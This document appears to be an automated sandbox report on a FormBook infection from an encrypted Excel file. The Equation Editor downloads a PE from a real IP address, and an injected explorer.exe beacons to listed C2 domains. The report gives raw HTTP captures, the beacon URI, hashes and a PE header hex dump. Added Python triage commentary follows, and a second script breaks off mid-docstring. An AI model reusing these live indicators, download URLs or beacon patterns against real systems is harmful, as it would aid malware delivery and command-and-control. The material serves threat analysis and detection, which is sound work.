                                                                                                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  C:\Users\Public\vbc.exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):713216
                                                                                                                                                  Entropy (8bit):7.571021299706813
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:BUEnk8yfaR+DaY3bsojKdqFyirJ5Y1oDpgAwUzl3XoJPcISRqzGWl06bsyaUVKnp:KEnkZCR+ZjKYjrw1o1H73XwPcIll/bz6
                                                                                                                                                  MD5:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  SHA1:27D6276E49602F3633DFDD94DE400DB53E209B51
                                                                                                                                                  SHA-256:D0F6F28C586B78DFBC7D4E6C277C20761C9DB38E0CD059807BE5252B52D10660
                                                                                                                                                  SHA-512:012E2122B51055DD011341E629890F3D7B9D3D8CE6984D62EDD287C625634C01B5FB7D220002C79D5E53EBF089FEE5C505B48FDCBE89951BEB36D0A92E9B96E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ........@.. .......................@............@.................................|...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........p...........L...0)...........................................0............( ...(!.........(.....o"....*.....................(#......($......(%......(&......('....*N..(....oE...((....*&..()....*.s*........s+........s,........s-........s.........*....0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....+..*.0......

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:CDFV2 Encrypted
                                                                                                                                                  Entropy (8bit):7.993957532893648
                                                                                                                                                  TrID:
                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                  File name:Form BA.xlsx
                                                                                                                                                  File size:1277440
                                                                                                                                                  MD5:f683a8eb2e17866a194af9b23efda095
                                                                                                                                                  SHA1:b3002f93d24336a9af003a7a3da36217a7d7b8db
                                                                                                                                                  SHA256:e6de55ef568521e22566496d9df49eb1a4cf2ea94082d8d0bcd357f41d2962ef
                                                                                                                                                  SHA512:7d61feb01d5ab561848c500232cefa553b6ef818487ef8361e13f32b00d8340425a93f518e867e449d689d1a2f3dfb4136ed9c9380c03fde7e72acf86e55716a
                                                                                                                                                  SSDEEP:24576:8eZrCoZjO0Z3LTlr6QoKZavurFhXI7EUMYcSNk5TIwrgm80Wa4+W3xBK8Gom9KvE:VZrCf0Z3d2e0urFhbpYBNk5T9q0bohBA
                                                                                                                                                  File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

File Icon

Icon Hash: e4e2aa8aa4b4bcb4

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "Form BA.xlsx"

Indicators

Has Summary Info: False
Application Name: unknown
Encrypted Document: True
Contains Word Document Stream: False
Contains Workbook/Book Stream: False
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type: data
Stream Size: 64
Entropy: 2.73637206947
Base64 Encoded: False

Stream Path: \x6DataSpaces/DataSpaceMap
File Type: data
Stream Size: 112
Entropy: 2.7597816111
Base64 Encoded: False

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type: data
Stream Size: 200
Entropy: 3.13335930328
Base64 Encoded: False

Stream Path: \x6DataSpaces/Version
File Type: data
Stream Size: 76
Entropy: 2.79079600998
Base64 Encoded: False

Stream Path: EncryptedPackage
File Type: data
Stream Size: 1263144
Entropy: 7.99876353791
Base64 Encoded: True

Stream Path: EncryptionInfo
File Type: data
Stream Size: 224
Entropy: 4.62639518968
Base64 Encoded: False

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                        Source Port  Dest Port  Source IP     Dest IP
07/22/21-17:16:43.686728  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49167        80         192.168.2.22  151.101.0.119
07/22/21-17:16:43.686728  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49167        80         192.168.2.22  151.101.0.119
07/22/21-17:16:43.686728  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49167        80         192.168.2.22  151.101.0.119
07/22/21-17:16:51.093327  ICMP      402      ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.22  8.8.8.8

Network Port Distribution

TCP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                                  Jul 22, 2021 17:15:02.964452982 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964483023 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964484930 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964512110 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964534998 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964536905 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964549065 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964562893 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964571953 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964589119 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964596987 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964612961 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964621067 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964638948 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964648962 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964664936 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964673042 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964695930 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964699984 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964724064 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964729071 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964750051 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964759111 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964776039 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964783907 CEST4916580192.168.2.223.121.113.175

                                                                                                                                                  UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:16:37.906949043 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:16:38.297278881 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:16:43.574949026 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:16:43.638854027 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:16:48.827698946 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:16:49.840526104 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:16:49.950583935 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:16:51.092057943 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22

                                                                                                                                                  ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jul 22, 2021 17:16:51.093327045 CEST | 192.168.2.22 | 8.8.8.8 | d041 | (Port unreachable) | Destination Unreachable

                                                                                                                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 17:16:37.906949043 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.pon.xyz | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:43.574949026 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.intoxickiss.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:48.827698946 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.800pls.info | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:49.840526104 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.800pls.info | A (IP address) | IN (0x0001)

                                                                                                                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 17:16:38.297278881 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | www.pon.xyz | 71822.bodis.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:16:38.297278881 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | 71822.bodis.com | | 199.59.242.153 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:43.638854027 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.intoxickiss.com | intoxickiss.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:16:43.638854027 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | intoxickiss.com | | 151.101.0.119 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:43.638854027 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | intoxickiss.com | | 151.101.64.119 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:43.638854027 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | intoxickiss.com | | 151.101.128.119 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:43.638854027 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | intoxickiss.com | | 151.101.192.119 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:49.950583935 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c4e | Name error (3) | www.800pls.info | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:51.092057943 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c4e | Name error (3) | www.800pls.info | none | none | A (IP address) | IN (0x0001)
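The three lookups above are the sandbox's view of a FormBook domain walk: www.pon.xyz parks at a Bodis CNAME, www.intoxickiss.com resolves to four addresses in 151.101.0.0/16 (the same host later answers the HTTP beacon with a 302 to portfolio.adobe.com), and www.800pls.info does not exist, so the stub resolver retransmits once with the same transaction ID 0x3c4e and receives two NXDOMAIN replies, the second arriving 1.1 s after the first, which lines up with the ICMP Port unreachable logged at 17:16:51.093. The script below is an added example, not part of the report, that groups the rows by transaction ID, follows each CNAME chain and classifies the queried name; QUERIES and ANSWERS are constructed from the two tables above, and the parking-provider suffix list is an assumption.

```python
"""Triage of sandbox DNS rows for a FormBook-style C2 domain walk.

Added example, not part of the Joe Sandbox report. QUERIES and ANSWERS are
constructed from the DNS Queries / DNS Answers tables above; the parking
provider suffix list is an assumption.
"""
from collections import defaultdict
from datetime import datetime

PARKING_CNAME_SUFFIXES = ("bodis.com",)   # assumption: a CNAME into these zones means "parked"


def _ts(s):
    """Parse the report's HH:MM:SS.nnnnnnnnn clock (nanoseconds cut to microseconds)."""
    hh, mm, rest = s.split(":")
    sec, frac = rest.split(".")
    return datetime(2021, 7, 22, int(hh), int(mm), int(sec), int(frac[:6]))


# (timestamp, transaction id, queried name)
QUERIES = [
    ("17:16:37.906949043", 0x2e78, "www.pon.xyz"),
    ("17:16:43.574949026", 0x2f03, "www.intoxickiss.com"),
    ("17:16:48.827698946", 0x3c4e, "www.800pls.info"),
    ("17:16:49.840526104", 0x3c4e, "www.800pls.info"),
]

# (timestamp, transaction id, reply code, owner name, CNAME target, A address)
ANSWERS = [
    ("17:16:38.297278881", 0x2e78, 0, "www.pon.xyz", "71822.bodis.com", None),
    ("17:16:38.297278881", 0x2e78, 0, "71822.bodis.com", None, "199.59.242.153"),
    ("17:16:43.638854027", 0x2f03, 0, "www.intoxickiss.com", "intoxickiss.com", None),
    ("17:16:43.638854027", 0x2f03, 0, "intoxickiss.com", None, "151.101.0.119"),
    ("17:16:43.638854027", 0x2f03, 0, "intoxickiss.com", None, "151.101.64.119"),
    ("17:16:43.638854027", 0x2f03, 0, "intoxickiss.com", None, "151.101.128.119"),
    ("17:16:43.638854027", 0x2f03, 0, "intoxickiss.com", None, "151.101.192.119"),
    ("17:16:49.950583935", 0x3c4e, 3, "www.800pls.info", None, None),
    ("17:16:51.092057943", 0x3c4e, 3, "www.800pls.info", None, None),
]


def triage_dns(queries, answers):
    """Group rows by transaction ID and classify each queried name.

    Returns a dict in first-query order:
    name -> {txid, attempts, answer_packets, rcode, cname_chain, addresses, verdict}
    """
    q_by_txid = defaultdict(list)
    for ts, txid, name in queries:
        q_by_txid[txid].append((_ts(ts), name))
    a_by_txid = defaultdict(list)
    for ts, txid, rcode, name, cname, addr in answers:
        a_by_txid[txid].append((_ts(ts), rcode, name, cname, addr))

    result = {}
    for txid, qs in sorted(q_by_txid.items(), key=lambda kv: min(kv[1])):
        qs.sort()
        name = qs[0][1]
        ans = sorted(a_by_txid.get(txid, []), key=lambda a: a[0])
        # Follow the CNAME chain from the queried name to the final owner name.
        chain, cur, seen = [], name, {name}
        while True:
            nxt = next((c for _, _, n, c, _ in ans if n == cur and c), None)
            if nxt is None or nxt in seen:      # end of chain, or a CNAME loop
                break
            chain.append(nxt)
            seen.add(nxt)
            cur = nxt
        addresses = [a for _, _, n, _, a in ans if a and n == cur]
        rcode = ans[0][1] if ans else None
        if rcode == 3:
            verdict = "nxdomain"
        elif any(c == s or c.endswith("." + s)
                 for c in chain for s in PARKING_CNAME_SUFFIXES):
            verdict = "parked"
        elif addresses:
            verdict = "resolved"
        else:
            verdict = "no-answer"
        result[name] = {
            "txid": txid,
            "attempts": len(qs),                         # queries sent (1 + retransmits)
            "answer_packets": len({a[0] for a in ans}),  # distinct reply packets seen
            "rcode": rcode,
            "cname_chain": chain,
            "addresses": addresses,
            "verdict": verdict,
        }
    return result


if __name__ == "__main__":
    for name, s in triage_dns(QUERIES, ANSWERS).items():
        print(f"{name:22} {s['verdict']:9} attempts={s['attempts']} "
              f"answers={s['answer_packets']} {s['cname_chain']} {s['addresses']}")
```

FormBook contacts a list of decoy domains alongside its live C2, so a name that is parked or NXDOMAIN is not by itself the C2; the value of the triage is the walk order and the one name that answered with real content, which the HTTP sessions below then confirm or rule out. An attempts count above one with more reply packets than the client could still accept is the pattern that produces the ICMP Port unreachable row above.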

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 3.121.113.175
                                                                                                                                                  • www.pon.xyz
                                                                                                                                                  • www.intoxickiss.com

                                                                                                                                                  HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 3.121.113.175 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:15:02.789858103 CEST | 0 | OUT | GET /www/pool.exe HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: 3.121.113.175
                                                                                                                                                  Connection: Keep-Alive
Jul 22, 2021 17:15:02.833070993 CEST | 1 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:14:54 GMT
                                                                                                                                                  Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                                                                                  Last-Modified: Thu, 22 Jul 2021 05:09:55 GMT
                                                                                                                                                  ETag: "ae200-5c7af4c3e3d9d"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 713216
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cc df f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d8 0a 00 00 08 00 00 00 00 00 00 ce f6 0a 00 00 20 00 00 00 00 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c f6 0a 00 4f 00 00 00 00 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec d6 0a 00 00 20 00 00 00 d8 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 0b 00 00 06 00 00 00 da 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0b 00 00 02 00 00 00 e0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 f6 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc e1 00 00 70 eb 00 00 03 00 00 00 01 00 00 06 4c cd 01 00 30 29 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 
00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 45 02 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 33 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 34 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 35 00 00 0a 6f 36 00 00 0a 73 37 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`P @ @@|O H.text `.rsrc@@.reloc @BHpL0)0( (!(o"*(#($(%(&('*N(oE((*&()*s*s+s,s-s.*0~o/+*0~o0+*0~o1+*0~o2+*0~o3+*0<~(4,!rp(5o6s7~+*0~


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 199.59.242.153 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:16:38.442984104 CEST | 755 | OUT | GET /wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz HTTP/1.1
                                                                                                                                                  Host: www.pon.xyz
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
Jul 22, 2021 17:16:38.568079948 CEST | 756 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:16:38 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NfckuEfRDoobrXb4RjADejgmV/38jhHArz5PznadVW/EOMjYWMA8MO/wUYEIfOHtudiTqbwWGyf8XYQ99hFcOA==
                                                                                                                                                  Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4e 66 63 6b 75 45 66 52 44 6f 6f 62 72 58 62 34 52 6a 41 44 65 6a 67 6d 56 2f 33 38 6a 68 48 41 72 7a 35 50 7a 6e 61 64 56 57 2f 45 4f 4d 6a 59 57 4d 41 38 4d 4f 2f 77 55 59 45 49 66 4f 48 74 75 64 69 54 71 62 77 57 47 79 66 38 58 59 51 39 39 68 46 63 4f 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 
62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                                                                                                  Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NfckuEfRDoobrXb4RjADejgmV/38jhHArz5PznadVW/EOMjYWMA8MO/wUYEIfOHtudiTqbwWGyf8XYQ99hFcOA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one
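
Session 0 is the exploit stage: EQNEDT32.EXE, the Office Equation Editor, fetches /www/pool.exe from 3.121.113.175 and the server returns a PE (Content-Type application/x-msdownload, body starting with the MZ header, 713216 bytes). Sessions 1 and 2 are the payload stage: the injected explorer.exe sends FormBook's GET beacon, a short directory (/wufn/), one long base64 parameter and one short token (yN94=f2JPQ0jxKXodUnz, identical across hosts), with a 7-byte NUL body, to one domain after another; www.pon.xyz answers with a parking page and www.intoxickiss.com with a 302. The following is an added example, not the report's own tooling, that turns those observations into checks over the session records. SESSIONS is constructed from sessions 0 to 2 (bodies truncated, the 302 body not reproduced); the process lists and the URI heuristics are assumptions fitted to this traffic.

```python
"""Triage of sandbox HTTP sessions: Equation Editor fetching a PE, then
FormBook-style beacons from an injected explorer.exe.

Added example, not part of the Joe Sandbox report. SESSIONS is constructed
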